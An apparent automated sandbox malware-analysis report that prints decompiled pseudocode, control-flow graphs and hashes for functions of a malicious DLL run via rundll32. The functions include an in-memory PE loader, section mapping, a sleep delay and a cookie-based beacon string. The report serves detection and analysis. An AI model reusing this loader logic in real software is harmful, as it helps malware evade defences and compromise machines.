      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: Heap$NameProcess$AccountFreeLookup$AllocComputerErrorLast
      • String ID:
      • API String ID: 2409119217-0
      • Opcode ID: a34f698e1f708103aaef8de00ac60e6572fcc8d6c95b913e3dba122220aa4ed4
      • Instruction ID: bccd91b441821ca56803e91b7d04f4d1ec65d623121010ca1dafda4b918fcf64
      • Opcode Fuzzy Hash: a34f698e1f708103aaef8de00ac60e6572fcc8d6c95b913e3dba122220aa4ed4
      • Instruction Fuzzy Hash: 06315E72701B498AEB62DF74E4443D933E5EB4DBC9F548026EA4D56A58EF38C60CC340
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0000000180002174 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66memoryCOMMON
      Download Yara Rule

      Control-flow Graph

      C-Code - Quality: 58%
      			E00000001180002174(void* __eax, void* __edx, void* __edi, void* __eflags, signed int __rax, signed int __rbx, signed int __rdx, long long __rdi, void* __rsi, void* __r11, void* __r14) {
				void* __rbp;
				void* _t27;
				void* _t45;
				signed long long _t54;
				signed long long _t60;
				void* _t75;
				long _t78;
				void* _t79;
				void* _t81;
				void* _t88;

				_t77 = __rsi;
				 *((long long*)(_t81 + 0x18)) = __rbx;
				 *((long long*)(_t81 + 0x20)) = __rdi;
				_t79 = _t81 - 0x57;
				asm("rdtsc");
				_t54 = __rax | __rdx << 0x00000020;
				_t57 = __rbx << 0x00000010 | _t60;
				SleepEx(_t78); // executed
				_t75 = __rdi - 1;
				if (__eflags != 0) goto 0x80002190;
				wsprintfW(??, ??);
				E00000001180002428(_t79 - 0x29, __rbx << 0x00000010 | _t60);
				_t9 = _t75 + 1; // 0x4
				E00000001180002860(0, _t9, _t45, _t54, __rbx << 0x00000010 | _t60, _t79 - 0x29, L"%016IX", __rsi, _t79, _t79 - 0x69, _t88);
				if (_t54 == 0) goto 0x8000224e;
				if (E00000001180001D80(_t9, _t54, _t54, _t57, _t79 + 0x1b, _t54, _t77, _t79, _t79 + 0x67, _t79 + 0x6f, __r11, __r14) == 0) goto 0x8000224e;
				if ( *((intOrPtr*)(_t79 + 0x6f)) - 0x400 < 0) goto 0x8000224e;
				_t27 = E00000001180001198(_t54,  *((intOrPtr*)(_t79 + 0x67)),  *((intOrPtr*)(_t79 + 0x6f)), _t79 + 0x67);
				if ( *((intOrPtr*)(_t79 + 0x67)) == 0) goto 0x80002232;
				GetProcessHeap();
				HeapFree(??, ??, ??);
				E00000001180001B5C(_t27, _t54,  *((intOrPtr*)(_t79 + 0x67)), _t79 - 0x69,  *((intOrPtr*)(_t79 + 0x6f)), _t77);
				if (_t54 == 0) goto 0x8000224e;
				E00000001180002480(_t54, _t79 + 0x1b, _t54);
				return 0;
			}













      0x180002174
      0x180002174
      0x180002179
      0x18000217f
      0x180002194
      0x18000219a
      0x1800021a0
      0x1800021a8
      0x1800021ae
      0x1800021b2
      0x1800021c2
      0x1800021cc
      0x1800021d8
      0x1800021db
      0x1800021e3
      0x1800021fb
      0x180002208
      0x18000220e
      0x18000221c
      0x18000221e
      0x18000222c
      0x180002238
      0x180002240
      0x180002249
      0x180002264

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: Heap$FreeProcessSleepwsprintf
      • String ID: %016IX
      • API String ID: 2187706517-1811457740
      • Opcode ID: 22af208baba866085d29c64b7848b84a41cee80f8a0e70526e1cf0428296f31c
      • Instruction ID: 661cb7bdf0d2a5cc3032a3c802704869fbd6bc5f67ca47283b56c7d180ea033d
      • Opcode Fuzzy Hash: 22af208baba866085d29c64b7848b84a41cee80f8a0e70526e1cf0428296f31c
      • Instruction Fuzzy Hash: E9214F72300A499AEB92DFA1D9543DD33A6E7487C4F888425BE0D6B699EE38D64CC350
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00007FFA65C55FF9 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50nativeCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 147 7ffa65c55ff9-7ffa65c5600f 148 7ffa65c561b7-7ffa65c561cc 147->148 149 7ffa65c561ce-7ffa65c561d7 148->149 150 7ffa65c561e1-7ffa65c561f7 148->150 151 7ffa65c5666d 149->151 152 7ffa65c561fd-7ffa65c5620c 150->152 153 7ffa65c56173-7ffa65c56188 150->153 158 7ffa65c56594-7ffa65c5659a 151->158 154 7ffa65c5620e-7ffa65c56215 NtCreateSection 152->154 155 7ffa65c5624b-7ffa65c5625b 152->155 156 7ffa65c5619f-7ffa65c561aa 153->156 157 7ffa65c5618a-7ffa65c56192 153->157 154->158 159 7ffa65c5621e-7ffa65c5622d 155->159 160 7ffa65c5625d-7ffa65c5626f 155->160 156->148 162 7ffa65c5616d-7ffa65c56171 157->162 163 7ffa65c56194-7ffa65c5619a 157->163 161 7ffa65c56681 158->161 159->160 164 7ffa65c5622f-7ffa65c5623a 159->164 160->164 166 7ffa65c56685-7ffa65c5668a 161->166 162->149 165 7ffa65c56691-7ffa65c56696 163->165 163->166 167 7ffa65c566c5-7ffa65c566d2 164->167 168 7ffa65c56677-7ffa65c5667c 165->168 169 7ffa65c56698-7ffa65c566a0 165->169 170 7ffa65c5668c 166->170 171 7ffa65c56672 166->171 172 7ffa65c566a7-7ffa65c566bb NtMapViewOfSection 167->172 173 7ffa65c566d4-7ffa65c566db 167->173 168->161 174 7ffa65c5676a-7ffa65c56777 call 7ffa65c57947 168->174 169->166 176 7ffa65c56752-7ffa65c56759 170->176 171->161 172->167 180 7ffa65c56740-7ffa65c56750 174->180 181 7ffa65c56779-7ffa65c56789 174->181 176->151 180->176 183 7ffa65c56731-7ffa65c5673e call 7ffa65c57947 180->183 185 7ffa65c566f2-7ffa65c5671d 181->185 183->180 188 7ffa65c5671f-7ffa65c5672f 183->188 185->181 185->188 188->183 189 7ffa65c5675e-7ffa65c56768 call 7ffa65c57947 188->189 189->174 189->185
      C-Code - Quality: 100%
      			E00007FFA7FFA65C55FF9(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __rdx, void* __r10, void* __r11, void* __r15, signed int _a80, intOrPtr _a308, intOrPtr _a312, intOrPtr _a316, intOrPtr _a320, intOrPtr _a324, intOrPtr _a328, intOrPtr _a332, intOrPtr _a336, intOrPtr _a340, intOrPtr _a344) {
				intOrPtr _t40;
				void* _t57;

				_a344 = 0x18f;
				_a344 = _a344 + 0xff;
				_a324 = 0x1d29;
				_a324 = _a324 + 0x3c;
				if (__ecx == __ecx) goto 0x65c56042;
				_a336 = 0x7b;
				_a336 = _a336;
				if (__edx == __edx) goto 0x65c5608a;
				_a328 = 6;
				_a328 = _a328 + 0x27;
				if (__ebx == __ebx) goto 0x65c56059;
				_a332 = 0x35;
				_a332 = _a332 + 0x17;
				if (__eax == __eax) goto 0x65c5602b;
				_a312 = 0x19cc;
				_a312 = _a312 + 0xa0;
				if (__ebx == __ebx) goto 0x65c560a5;
				_a340 = 0xd9;
				_a340 = _a340 + 0x81;
				goto E00007FFA7FFA65C55FF9;
				_a316 = 0x5c;
				_a316 = _a316 + 0x8f;
				if (__ecx == __ecx) goto 0x65c560d7;
				_a308 = 7;
				_a308 = _a308 + 0x12;
				if (__ecx == __ecx) goto 0x65c56070;
				_a320 = 0x24b;
				_a320 = _a320 + 0x30;
				if (__edx == __edx) goto L1;
				_t40 =  *((intOrPtr*)(_t57 + 0x70 + _a80 * 4));
				if (_t40 - 0x1f4 <= 0) goto 0x65c560f2;
				return _t40;
			}





      0x7ffa65c55ff9
      0x7ffa65c56004
      0x7ffa65c56014
      0x7ffa65c5601f
      0x7ffa65c56029
      0x7ffa65c5602b
      0x7ffa65c56036
      0x7ffa65c56040
      0x7ffa65c56042
      0x7ffa65c5604d
      0x7ffa65c56057
      0x7ffa65c56059
      0x7ffa65c56064
      0x7ffa65c5606e
      0x7ffa65c56070
      0x7ffa65c5607b
      0x7ffa65c56088
      0x7ffa65c5608a
      0x7ffa65c56095
      0x7ffa65c560a0
      0x7ffa65c560a5
      0x7ffa65c560b0
      0x7ffa65c560be
      0x7ffa65c560c0
      0x7ffa65c560cb
      0x7ffa65c560d5
      0x7ffa65c560d7
      0x7ffa65c560e2
      0x7ffa65c560ec
      0x7ffa65c560f7
      0x7ffa65c56105
      0x7ffa65c5611b

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.432207126.00007FFA65C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA65C50000, based on PE: true
      • Associated: 00000003.00000002.432202126.00007FFA65C50000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000003.00000002.432372505.00007FFA65CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ffa65c50000_rundll32.jbxd
      Similarity
      • API ID: CreateSection
      • String ID: $$'$<
      • API String ID: 2449625523-1052150772
      • Opcode ID: a827bfe900c49c1c2808823daf063abfa26f5a14f1beb8bf1ce44c1864846899
      • Instruction ID: 8f95168fea3bebebc5f453c317db184a386bce69e7e13fa3326a3168ab61e92e
      • Opcode Fuzzy Hash: a827bfe900c49c1c2808823daf063abfa26f5a14f1beb8bf1ce44c1864846899
      • Instruction Fuzzy Hash: A5211B7780C6C2CFE7708B94E4483BBB7A0E786B16F508535D38A46A89DB7DD4989F00
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00007FFA65C55FE6 Relevance: 3.0, APIs: 2, Instructions: 40nativeCOMMON
      Download Yara Rule

      Control-flow Graph

      C-Code - Quality: 100%
      			E00007FFA7FFA65C55FE6(void* __ebx, void* __ecx, void* __edx, void* __rdx, void* __r10, void* __r11, void* __r15, signed int _a80, intOrPtr _a88, intOrPtr _a308, intOrPtr _a312, intOrPtr _a316, intOrPtr _a320, intOrPtr _a324, intOrPtr _a328, intOrPtr _a332, intOrPtr _a336, intOrPtr _a340, intOrPtr _a344, intOrPtr _a448) {
				intOrPtr _t41;

				if (_a88 < 0) goto 0x65c55fdd;
				_t41 = _a448;
				_a344 = 0x18f;
				_a344 = _a344 + 0xff;
				_a324 = 0x1d29;
				_a324 = _a324 + 0x3c;
				if (__ecx == __ecx) goto 0x65c56042;
				_a336 = 0x7b;
				_a336 = _a336;
				if (__edx == __edx) goto 0x65c5608a;
				_a328 = 6;
				_a328 = _a328 + 0x27;
				if (__ebx == __ebx) goto 0x65c56059;
				_a332 = 0x35;
				_a332 = _a332 + 0x17;
				if (_t41 == _t41) goto 0x65c5602b;
				_a312 = 0x19cc;
				_a312 = _a312 + 0xa0;
				if (__ebx == __ebx) goto 0x65c560a5;
				_a340 = 0xd9;
				_a340 = _a340 + 0x81;
				goto L1;
				_a316 = 0x5c;
				_a316 = _a316 + 0x8f;
				if (__cx == __cx) goto 0x65c560d7;
				_a308 = 7;
				_a308 = _a308 + 0x12;
				if (__ch == __ch) goto 0x65c56070;
				_a320 = 0x24b;
				_a320 = _a320 + 0x30;
				if (__dl == __dl) goto L2;
				__eax =  *((intOrPtr*)(__rsp + 0x70 + _a80 * 4));
				if (__eax - 0x1f4 <= 0) goto 0x65c560f2;
				_t38 = __r10;
				__r10 = __rsp;
				__rsp = _t38;
				__r11 = __r11 << 0x40;
				return __eax;
			}




      0x7ffa65c55feb
      0x7ffa65c55fed
      0x7ffa65c55ff9
      0x7ffa65c56004
      0x7ffa65c56014
      0x7ffa65c5601f
      0x7ffa65c56029
      0x7ffa65c5602b
      0x7ffa65c56036
      0x7ffa65c56040
      0x7ffa65c56042
      0x7ffa65c5604d
      0x7ffa65c56057
      0x7ffa65c56059
      0x7ffa65c56064
      0x7ffa65c5606e
      0x7ffa65c56070
      0x7ffa65c5607b
      0x7ffa65c56088
      0x7ffa65c5608a
      0x7ffa65c56095
      0x7ffa65c560a0
      0x7ffa65c560a5
      0x7ffa65c560b0
      0x7ffa65c560be
      0x7ffa65c560c0
      0x7ffa65c560cb
      0x7ffa65c560d5
      0x7ffa65c560d7
      0x7ffa65c560e2
      0x7ffa65c560ec
      0x7ffa65c560f7
      0x7ffa65c56105
      0x7ffa65c5610e
      0x7ffa65c5610e
      0x7ffa65c5610e
      0x7ffa65c56116
      0x7ffa65c5611b

      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.432207126.00007FFA65C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA65C50000, based on PE: true
      • Associated: 00000003.00000002.432202126.00007FFA65C50000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000003.00000002.432372505.00007FFA65CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ffa65c50000_rundll32.jbxd
      Similarity
      • API ID: CreateSection
      • String ID:
      • API String ID: 2449625523-0
      • Opcode ID: 8b32971e4af457eda586907c53b90aeb09a8bd07261add21a48acce25afcaa35
      • Instruction ID: 07ae4e7b80015b288a4028d9cb93d811ed02dbb4ca6f5c3a02a754ee45117526
      • Opcode Fuzzy Hash: 8b32971e4af457eda586907c53b90aeb09a8bd07261add21a48acce25afcaa35
      • Instruction Fuzzy Hash: 02114F7390CAC1CAE7B08B90E0443AAB7A1F782795F904035E38E46E98DF7DD4948F01
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0000000180002860 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65memoryCOMMON
      Download Yara Rule

      Control-flow Graph

      C-Code - Quality: 43%
      			E00000001180002860(void* __ebx, void* __edx, void* __ebp, long long* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
				void* __rdi;
				int _t23;
				int _t24;
				void* _t35;
				long long* _t42;
				void* _t47;
				signed long long _t48;
				signed long long _t49;
				long long* _t72;
				void* _t74;

				_t42 = __rax;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t74 = __r8;
				GetProcessHeap();
				r8d = 0x2001;
				RtlAllocateHeap(??, ??, ??); // executed
				_t72 = __rax;
				if (__rax == 0) goto 0x80002959;
				r9d = _t35;
				_t23 = wsprintfW(??, ??);
				r9d = __edx;
				_t24 = wsprintfW(??, ??);
				r9d = E00000001180001484(_t24, __rax, L"%s%u");
				_t47 = _t23 + _t24 + wsprintfW(??, ??);
				r9d = E0000000118000108C(__rax, _t47, __r8);
				_t48 = _t47 + wsprintfW(??, ??);
				E00000001180001904(__rax, _t48, __rax + _t48 * 2, _t74);
				_t49 = _t48 + __rax;
				E000000011800027B4(__rax, _t49, __rax + _t49 * 2);
				_t50 = _t49 + __rax;
				E00000001180002018(_t49 + __rax, __rax + (_t49 + __rax) * 2, _t74, __rax, _t74);
				return E0000000118000133C(_t50 + _t42, _t72 + (_t50 + _t42) * 2, _t74, ":");
			}













      0x180002860
      0x180002860
      0x180002865
      0x18000286a
      0x180002874
      0x18000287b
      0x180002886
      0x18000288f
      0x180002895
      0x18000289b
      0x1800028a1
      0x1800028b5
      0x1800028be
      0x1800028d6
      0x1800028eb
      0x180002901
      0x18000290d
      0x180002923
      0x18000292a
      0x18000292f
      0x180002936
      0x18000293b
      0x180002945
      0x18000296d

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: wsprintf$Heap$Process$AddressLibraryLoadProc$AdaptersAllocInfoName$AllocateComputerCount64FreeInformationQuerySystemTickUser
      • String ID: %s%u$Cookie: __gads=
      • API String ID: 392523097-3007860590
      • Opcode ID: 331763b53d6f8557935e9ebf42fdd2c7f373a1b19adadbe0eaccf4172c03b777
      • Instruction ID: 8f6dff4a45bc758f9ad86f1329c8408aa2d07b8871dc2bc0e96f96c00fe38273
      • Opcode Fuzzy Hash: 331763b53d6f8557935e9ebf42fdd2c7f373a1b19adadbe0eaccf4172c03b777
      • Instruction Fuzzy Hash: 2C214872740A0996EB92DB55F8543E87360BB5CBC1F848129AB4D57772EE3CC62DC340
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0000000180001BD4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 143 180001bd4-180001c0c LoadLibraryA GetProcAddress 145 180001c15-180001c25 143->145 146 180001c0e-180001c13 GetNativeSystemInfo 143->146 146->145
      APIs
      • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0000011C,00000001800019FF), ref: 0000000180001BF1
      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,0000011C,00000001800019FF), ref: 0000000180001C01
      • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,0000011C,00000001800019FF), ref: 0000000180001C13
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: AddressInfoLibraryLoadNativeProcSystem
      • String ID: GetNativeSystemInfo$KERNEL32.DLL
      • API String ID: 2103483237-4162215167
      • Opcode ID: 422b05c43dcb4eb9de9b7d23b9406151622cf17c3d48ce90b7700ffe9165f4bc
      • Instruction ID: 8e61e42ac17d5e92d5409a7507b4c0ea04a19fa1e2651f3f55c474f49308d06d
      • Opcode Fuzzy Hash: 422b05c43dcb4eb9de9b7d23b9406151622cf17c3d48ce90b7700ffe9165f4bc
      • Instruction Fuzzy Hash: 0BE06D72B24509D2EB93EB20E8543D93360FB9C780F848221A54E026A4EF2CD78DC740
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0000021281D00000 Relevance: 6.7, APIs: 4, Instructions: 735memorylibraryCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 192 21281d00000-21281d0008f call 21281d00618 * 6 205 21281d00095-21281d00098 192->205 206 21281d005fa 192->206 205->206 208 21281d0009e-21281d000a1 205->208 207 21281d005fc-21281d00616 206->207 208->206 209 21281d000a7-21281d000aa 208->209 209->206 210 21281d000b0-21281d000b3 209->210 210->206 211 21281d000b9-21281d000bc 210->211 211->206 212 21281d000c2-21281d000d0 211->212 212->206 213 21281d000d6-21281d000df 212->213 213->206 214 21281d000e5-21281d000ed 213->214 214->206 215 21281d000f3-21281d00101 214->215 216 21281d00103-21281d00108 215->216 217 21281d00127-21281d00159 GetNativeSystemInfo 215->217 218 21281d0010b-21281d00125 216->218 217->206 219 21281d0015f-21281d0017b VirtualAlloc 217->219 218->217 218->218 220 21281d00192-21281d0019d 219->220 221 21281d0017d-21281d00190 219->221 222 21281d0019f-21281d001ae 220->222 223 21281d001b0-21281d001cc 220->223 221->220 222->222 222->223 225 21281d0020a-21281d00217 223->225 226 21281d001ce-21281d001cf 223->226 227 21281d002d2-21281d002d9 225->227 228 21281d0021d-21281d00224 225->228 229 21281d001d1-21281d001d7 226->229 230 21281d00345-21281d0034c 227->230 231 21281d002db-21281d002eb 227->231 228->227 232 21281d0022a-21281d00237 228->232 233 21281d001f9-21281d00208 229->233 234 21281d001d9-21281d001f7 229->234 237 21281d0034e-21281d00361 230->237 238 21281d003c0-21281d003d1 230->238 231->230 235 21281d002ed-21281d002ee 231->235 232->227 236 21281d0023d-21281d00244 232->236 233->225 233->229 234->233 234->234 239 21281d002f1-21281d0030a LoadLibraryA 235->239 240 21281d00247-21281d0024b 236->240 237->238 243 21281d00363-21281d00364 237->243 241 21281d003d7-21281d003e0 238->241 242 21281d004e1-21281d004fa 238->242 245 21281d0032c-21281d00332 239->245 246 21281d002ba-21281d002c4 240->246 247 21281d003e5-21281d003e7 241->247 262 21281d004fc-21281d00504 242->262 263 21281d00521-21281d00525 242->263 244 21281d00367-21281d00380 243->244 266 21281d003a8-21281d003ab 244->266 249 21281d00334-21281d0033f 245->249 250 21281d0030c 245->250 251 21281d002c6-21281d002cc 246->251 252 21281d0024d-21281d00261 246->252 253 21281d004cc-21281d004db 247->253 254 21281d003ed-21281d003f8 247->254 249->239 264 21281d00341-21281d00342 249->264 258 21281d00313-21281d00318 250->258 259 21281d0030e-21281d00311 250->259 251->227 251->240 260 21281d00263-21281d00283 252->260 261 21281d00285-21281d00289 252->261 253->242 253->247 255 21281d003fa-21281d003fd 254->255 256 21281d00411-21281d00413 254->256 255->256 265 21281d003ff-21281d00401 255->265 267 21281d00415-21281d00418 256->267 268 21281d0044e-21281d00451 256->268 269 21281d0031a-21281d00329 258->269 259->269 270 21281d002b7-21281d002b8 260->270 271 21281d0028b-21281d0028d 261->271 272 21281d0028f-21281d00293 261->272 273 21281d00508-21281d0050e 262->273 274 21281d00544-21281d0054b 263->274 275 21281d00527-21281d00540 263->275 264->230 265->256 280 21281d00403-21281d0040c 265->280 287 21281d00382-21281d00389 266->287 288 21281d003ad-21281d003ba 266->288 281 21281d00424-21281d00426 267->281 282 21281d0041a-21281d0041c 267->282 278 21281d00453-21281d00455 268->278 279 21281d0045f-21281d00461 268->279 269->245 270->246 283 21281d002aa-21281d002b4 271->283 284 21281d00295-21281d0029f 272->284 285 21281d002a1-21281d002a5 272->285 273->263 286 21281d00510-21281d0051f 273->286 276 21281d005f5-21281d005f8 274->276 277 21281d00551-21281d00569 274->277 275->274 276->207 289 21281d0057b-21281d0058b 277->289 290 21281d0056b-21281d00579 277->290 278->279 291 21281d00457-21281d0045d 278->291 292 21281d00463-21281d00466 279->292 293 21281d004a7-21281d004a8 279->293 298 21281d004ab-21281d004b2 280->298 281->268 300 21281d00428-21281d0042b 281->300 282->281 299 21281d0041e-21281d00422 282->299 283->270 284->283 285->270 296 21281d002a7 285->296 286->273 294 21281d0038b-21281d0038e 287->294 295 21281d00390-21281d00395 287->295 288->244 297 21281d003bc-21281d003bd 288->297 289->276 302 21281d0058d-21281d0058e 289->302 290->289 290->290 303 21281d00487-21281d0048b 291->303 304 21281d00474-21281d00476 292->304 305 21281d00468-21281d0046a 292->305 293->298 306 21281d00397-21281d003a5 294->306 295->306 296->283 297->238 307 21281d004b4-21281d004ba 298->307 308 21281d004bd-21281d004ca VirtualProtect 298->308 299->303 309 21281d00437-21281d00439 300->309 310 21281d0042d-21281d0042f 300->310 312 21281d00590-21281d00594 302->312 303->298 304->293 314 21281d00478-21281d0047b 304->314 305->304 313 21281d0046c-21281d00472 305->313 306->266 307->308 308->253 309->268 316 21281d0043b-21281d0043e 309->316 310->309 315 21281d00431-21281d00435 310->315 317 21281d005b5-21281d005b8 312->317 318 21281d00596-21281d005a0 312->318 313->303 320 21281d0048d-21281d0048f 314->320 321 21281d0047d-21281d0047f 314->321 315->303 322 21281d0044a-21281d0044c 316->322 323 21281d00440-21281d00442 316->323 325 21281d005ba-21281d005bd 317->325 326 21281d005bf-21281d005c3 317->326 324 21281d005a3-21281d005b3 318->324 320->293 328 21281d00491-21281d00494 320->328 321->320 327 21281d00481-21281d00482 321->327 322->268 322->293 323->322 329 21281d00444-21281d00448 323->329 324->317 324->324 325->326 330 21281d005d3-21281d005e2 325->330 331 21281d005e5-21281d005f3 326->331 332 21281d005c5-21281d005cf 326->332 327->303 328->293 333 21281d00496-21281d004a5 328->333 329->303 330->331 331->276 332->276 334 21281d005d1 332->334 333->303 334->312
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.432142362.0000021281D00000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021281D00000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_21281d00000_rundll32.jbxd
      Similarity
      • API ID: Virtual$AllocInfoLibraryLoadNativeProtectSystem
      • String ID:
      • API String ID: 395219687-0
      • Opcode ID: dd72a9d3825b757cb599c52874617b57d3dfc330cdb9a130d1801265dc8a93a8
      • Instruction ID: 35303cf2acb6a0d4121e7d4754d452ef11632639272d3bb8323fc264071ca411
      • Opcode Fuzzy Hash: dd72a9d3825b757cb599c52874617b57d3dfc330cdb9a130d1801265dc8a93a8
      • Instruction Fuzzy Hash: 14221C30618E29DFEB68AE58D8493F573D1FB64351F26012DE88BC32C1EA34EC578695
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0000000180001318 Relevance: 3.0, APIs: 2, Instructions: 8COMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 356 180001318-18000131c 357 180001329-180001330 356->357 358 180001332-180001334 ExitProcess 357->358 359 18000131e-180001323 SleepEx 357->359 359->357
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: ExitProcessSleep
      • String ID:
      • API String ID: 911557368-0
      • Opcode ID: 87f2df61503c43403be47c73b52c885253801360124acf11aa6c9924d5a50bed
      • Instruction ID: 6bf3646277ed7659d23c391addaeef7dd43479a1e5d5f4f4aeea11294e6aed9e
      • Opcode Fuzzy Hash: 87f2df61503c43403be47c73b52c885253801360124acf11aa6c9924d5a50bed
      • Instruction Fuzzy Hash: C3D01231200248C7F2DBA721E8183EC3164A308382F90C129A106444E08F380B8C8304
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00007FFA65C536FA Relevance: 1.6, APIs: 1, Instructions: 79COMMON
      Download Yara Rule

      Control-flow Graph

      C-Code - Quality: 72%
      			E00007FFA7FFA65C536FA(void* __ebx, void* __edx, void* __edi, void* __esi, void* __esp, intOrPtr* _a8, intOrPtr* _a16, signed int _a33, char _a36, char _a37, long long _a40, long long _a48, long long _a56, signed int _a64, long long _a72, long long _a80, long long _a88, long long _a96, void* _a136) {
				unsigned int _v48;
				intOrPtr _v64;
				intOrPtr* _v72;
				unsigned int _v80;
				char _v87;
				char _v88;
				long long _v104;
				signed long long _v112;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				signed int _t70;
				signed int _t71;
				intOrPtr _t76;
				signed int _t77;
				signed int _t78;
				void* _t82;
				signed int _t87;
				void* _t92;
				void* _t101;
				long long _t128;
				long long _t129;
				long long _t130;
				long long _t132;
				long long _t133;
				void* _t140;
				void* _t141;
				intOrPtr* _t154;
				long long _t155;
				void* _t156;
				void* _t157;
				void* _t158;
				void* _t159;
				void* _t160;
				void* _t161;
				void* _t162;
				void* _t163;
				void* _t164;
				void* _t165;
				void* _t166;
				void* _t167;
				void* _t168;

				_t92 = __edx;
				_t128 = _a56 + 2;
				if (__esp == __esp) goto 0x65c53721;
				_t64 = E00007FFA7FFA65C57947(_t63, __ebx, _t82, __edx, __edi, __esi, _t128, _t140, _t141, _t157, _t160, _t162, _t164, _t166, _t168);
				_a96 = _t128;
				goto 0x65c53845;
				goto 0x65c53708;
				_a56 = _t128;
				_t129 = _a40;
				if (_t64 == _t64) goto 0x65c536ec;
				_t65 = E00007FFA7FFA65C57947(_t64, __ebx, 0xd45a1e1f, _t92, __edi, __esi, _t129, _t140, _t141, _t157, _t160, _t162, _t164, _t166, _t168);
				_a88 = _t129;
				if (_t92 == _t92) goto 0x65c53717;
				 *((intOrPtr*)(_a136 + 8)) = _t65;
